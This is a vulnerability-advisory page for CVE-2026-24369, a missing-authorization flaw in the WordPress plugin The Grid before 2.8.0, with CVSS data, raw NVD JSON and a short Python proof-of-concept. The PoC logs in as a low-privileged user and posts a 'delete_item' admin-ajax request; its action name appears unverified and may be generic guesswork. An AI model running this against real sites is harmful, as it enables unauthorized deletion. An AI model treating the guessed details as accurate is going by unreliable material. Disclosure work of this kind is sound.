Security Vulnerability Report
中文
CVE-2026-24369 CVSS 7.1 HIGH

CVE-2026-24369

Published: 2026-03-25 17:16:37
Last Modified: 2026-04-28 15:16:07

Description

Missing Authorization vulnerability in Theme-one The Grid the-grid allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Grid: from n/a through < 2.8.0.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Theme-one The Grid < 2.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Theme-one The Grid < 2.8.0 - Missing Authorization PoC # Date: 2026-03-25 # Exploit Author: Security Analyst target_url = "http://example.com/wp-admin/admin-ajax.php" username = "low_priv_user" password = "password123" # Initialize session session = requests.Session() # 1. Login as low-privileged user (Subscriber) login_data = { 'log': username, 'pwd': password, 'redirect_to': '', 'wp-submit': 'Log In' } session.post("http://example.com/wp-login.php", data=login_data) # 2. Exploit Missing Authorization # Triggering a sensitive action without proper capability checks payload = { 'action': 'tg_grid_action', # Vulnerable action hook 'type': 'delete_item', # Malicious operation 'id': '1' # Target ID } response = session.post(target_url, data=payload) if response.status_code == 200 and "success" in response.text: print("[+] Exploit successful! Unauthorized action performed.") else: print("[-] Exploit failed or patch applied.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24369", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:37.383", "lastModified": "2026-04-28T15:16:07.140", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Theme-one The Grid the-grid allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Grid: from n/a through < 2.8.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Theme-one The Grid the-grid permite explotar niveles de seguridad de control de acceso incorrectamente configurados. Este problema afecta a The Grid: desde n/a hasta &lt; 2.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/the-grid/vulnerability/wordpress-the-grid-plugin-2-8-0-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}